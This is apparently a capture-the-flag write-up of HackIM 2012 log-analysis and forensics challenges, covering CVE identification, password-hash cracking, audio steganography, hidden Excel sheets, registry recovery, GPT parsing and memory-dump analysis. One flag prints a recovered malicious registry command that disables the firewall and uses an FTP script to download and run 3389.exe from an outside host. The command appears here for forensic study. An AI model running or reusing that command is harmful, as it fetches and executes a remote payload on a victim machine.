    afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE- XXXX-XXXX --> Description: CVE of the Exploit is the Flag Analysis: This challenge was all about finding a CVE exhibited by the content in the log. As mentioned it was a burp suite log. To make the view easier, I renamed the log file into log.xml and opened it in web browser. Again this log had many 404 Not Found Requests.After going through first few lines, came across the logs of Tikiwiki, there was other logs of joomla, but I preferred to go sequentially. Since I m not good with exploit identification. I browsed to http://nvd.nist.gov/ and searched CVE for tikiwiki. Most of the result returned CVE related to XSS but in our log I couldn’t see any such XSS thing, so went with exceptions, and eventually got the flag. Honestly I couldn’t understand which line in the log referred to the CVE, but I had an answer for the question. Flag: CVE-2005-1921 Log Analysis 5: Waat Laga Server Official Hint: Page Source :<! -- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 --> Description: dump.rar Analysis: Again 95 MB of logs, loaded it into wireshark and tried for few minutes to look into it, looked at first few lines and last few lines, honestly didn’t understood, as it was really difficult to browse through each lines one by one. Tried to find some alternate way and couldn’t learn much all I got was some bogus ads for shareware log explorers asking for $$$.Came back to description again and noticed that for 3rd flag name was required. Googled for the string “Local Privilege Escalation Exploit” and the search resulted some exploit-db papers. The interesting thing I noticed that was CVE that may help me with author identification. Next challenge was to look for CVE in such a huge log, used cat command but that didn’t help, again tried with few more of them but there was no result, eventually ended up with the string command to get the CVE;
  28. Also found the paper at http://www.exploit-db.com/exploits/9479/ .Finally got my first

    flag for the challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and came to understand from the title that it was local root exploit. Now expectations were high with strings command and I extracted all the strings from the dump to a plain text file.The command I used was: strings dump.pcapng > dump.txt By this time I had a stripped version of the log with with more important things. Next I tried to look for the last flag that was for the root password. Since it was a local root exploit. I looked for the pattern root inside dump.txt and got the hash for the root. Next I used JohnTheRipper to crack the hash and got my 2nd flag as : zuzana Onto the hunt for 3rd flag, it asked to look for the vulnerable parameter.Opened dump.txt and saw that there were many 404 , so again it was time to eliminate those and consider the successful responses.i tried with few variations and again stripped down dump.txt to ok.txt now we had much smaller information to analyze. Went through the file ok.txt and observed and got to noticed that the parameters page, title and id was common with the entire GET request. Hence with variation of parameters, I got the flag successfully, I had to spend too much time with all those iterations and variations, indeed it was one of the level on which I had spent much more time to analyze to get the flag. Flag:
  29. ===================================================================== Forensics Levels Forensics Level 1: Tum Agar Dhyan Se

    Baat Meri Suno Official Hint: Page Source:<!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 --> Description:While conducting the raid on a suspect the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside the same.You are asked to find out that code if hidden in the file. Analysis: This was one of the coolest challenge in the HackIM 2012 CTF. I listened to the audio and observed that there was distortion at certain places and also heard that the distortion appeared on single channel. I had earlier used audio editor software “GoldWave”. I opened that audio in GoldWave and separated those distortions from the main stream, since the distortion was on single channel (right) the task became easier. After listening to the distortion it didn’t gave up any meaning, and thought of applying some sound effect, on the very first attempt applying the reverse sound effect I got the flag. Flag: 12344346765 Forensics Level 2: Andar Ch0r Official Hint: A night with MS Office Page Source :<!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 --> Description: company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes secretly outside the organization. The company sniffed the data being sent and reconstructed it to find that a word document was being sent. The company strongly suspects that there is some hidden passport code in the document. You as a forensic investigator are provided with the copy of that file and are required to find out the hidden code. The code has to be in whole number. Analysis: This challenge was full of twist, I enjoyed solving it. I opened the given word document and saw some numeric digits; it was some hex values, I converted them into ASCII and was made fool. After a while I doubt about the file and tried to confirm it using TrID : http://mark0.net/onlinetrid.aspx, The result showed up with possibility of the file being an excel document. I renamed the file into flag.xls and opened it in excel. Cool I was on right path, now I had no idea of what to do.Next I opened the file in notepad and went through the lines,
  30. somewhere near the end I saw some plain text “Hey

    Good Job done…..” and just below there was “Sheet1” and “Sheet2” but I couldn’t remember figuring any Sheet2 in flag.xls. So got an idea that it was hidden. It had been ages since I had worked on any excel sheet so really had forgotten how to hide excel sheets. Google, and got a link: http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel- 2007-2010/ So now sheet2 was visible, but still I was far away from my flag.Again followed up the link where it had asked to use VB Editor to unhide the supper hidden worksheet.(ALT+F11). Saved it, and finally Sheet3 was revealed with the flag in it. Flag: 6924289
  31. Forensics Level 3: Not Guilty! Official Hint: Page Source :<!--

    md5sum: 66666e32a8296f3073619c1dea43d9bf --> Description: An employee was suspected of using some malicious files. The employee asserts that he is not guilty because he never used any program except Microsoft word and excel. While conducting the analysis nothing was found in the registry suggesting that something did run automatically. All locations that can run program automatically were examined and nothing malicious was found. You as an investigator are provided with a piece of hive to carve out if anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets the justice. Analysis: This level was all about registry recovery. I had never encountered such incident and to understand it went through several forensics articles of registry recovery. Initially I download a windows binary of a tool called Yet Another Registry Utility (YARU). Played with it for some time and realized that it wouldn’t help me to come somewhere around the flag. Quit and went through few more manuals. Eventually came across a tool called as “reglookup-recover”. It was an open source, installed on ubuntu and went through the instructions. After this it wasn’t much tough to get the flag. Came back to description and cross checked the values obtained with the result, ending up solving this level. Flag: Value:Shell Value Type:REG_SZ Data:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
  32. Forensics Level 4: Intriguing MBR Official Hint: Sometimes things spill

    over Page Source: <!-- <form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp" onsubmit="return validate_form(this);"> --> Description: A suspected drive was found in bad shape. The data extraction was almost impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever the system could not read the space was filled with 0x00 so as to keep the offset of the data obtained intact. The initial sector displayed a messy MBR data. As a forensic investigator you are required to find the following information: 1) The number of partitions in the damaged drives 2) The start and end LBA for each partition 3) The Start and end of unpartitioned space between two clusters The Drive showed to be a SATA drive with 512 bytes of LBA Analysis: Yet another level that kept me away from doing anything. Merely a 20KB file but may require 20 hours to understand it for a newbie like me. Started with the google on partition forensics and ended up with GUID partition table on wikipedia, a long story probably would speak about it sometime later (Evil Mind). So the first thing that we required for this challenge was some boot record parsers. I got one at http://www.garykessler.net/software/index.html. The package contained 5 Perl scripts, extracted it to a folder. 1. I parsed a GUID Partition Table (GPT) header file image.dd using GPTparser.pl
  33. Result of parsing: 2. Coming back to wikipedia, there was

    a header format for LBA1: 3. So comparing the offset 072-079 from image.dd with the one on the table below, we can conclude that there are 9 partitions,( 2 primary copies as mentioned, and 7 between 72- 79)
  34. 4. Also it had been mentioned in the description that

    the LBA size was 512 bytes. And in our image.dd we can observe from the result of parsing that the partition table is starting from the offset 80. Hence the next LBA will be at (512+80)=592 5. Now it was time for some hex editing, I opened image.dd and traversed to position 592(250h). Since we had concluded in our earlier steps that there were 9 partitions. We had to edit the location from 00 to 09 6. Now again we had to parse the modified image.dd. 7. As in Step1 and we got all our 9 partitions. 8. Now next step was to observer the GUID from the result and match it with the table given on wikipedia to find out the partition type.
  35. 9. Finally the LBA thus obtained was not arranged accordingly

    and we had to arrange it in ascending order so as to obtain the flag. Flag: Forensics Level 5: Universal Swindlers Bayonet Official Hint: Page Source :<!-- Format Expected: "DD/MM/YYYY HH:MM:SS" --> Description: Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it conducts? Very often the employees leaving the organisation manage to carry the research data alongwith. This time company decided to go for the investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump. You as an investigator are required to find out the following information from the dump 1) Serial No. of external drive 2) Date and time (IST) when the drive was first connected 3) Date and time (IST) when the drive was last connected 4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe Analysis: This level was all about memory dump investigation.As usual had to lookup in google to find some memory dump analysis tool. Came across Memoryze and Audit Viewer.I installed it and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a wizard which I followed up accordingly. After a while I got the results in a simple formatted way. I tried going through the windows but couldn’t find anything much relevant and ended up getting only the last flag.
  36. Again went through the various links and came across a

    tool named volatility. Installed it and played with it for a while.With the following working steps I got the rest flags: 1. I tried to locate the registry hive where we could find the external drive information. 2. The second last registry hive was supposed to store all the drive information. 3. I dumped the second last hive and got a very long list of registry information. 4. The challenge was to look for the external drive information I went through few analysis articles and found that USBSTOR key stores the external USB drive information. 5. Hence ended up with the following command and got the result successfully.
  37. 6. But still the flag was not yet completed the

    page source revealed that the expect time must be in IST hence we had to add +5:30 to the time when drive was first connected and last disconnected. Flag: Finally Near The End, Few Words: - All the links and tools mentioned above were functioning during this write-up and I cannot assume it to be working throughout. - I apologize for any grammatical mistakes or with my poor English. - The ideas mentioned above are my own and may differ from yours. - I completely agree with the fact that there can be much better way to solve the above challenges but eventually mine ideas worked out. - Wish Happy Hacking to Everyone. - End, Regards To All The Members of NULL. The epic story ends here….. ~$-THE END-$~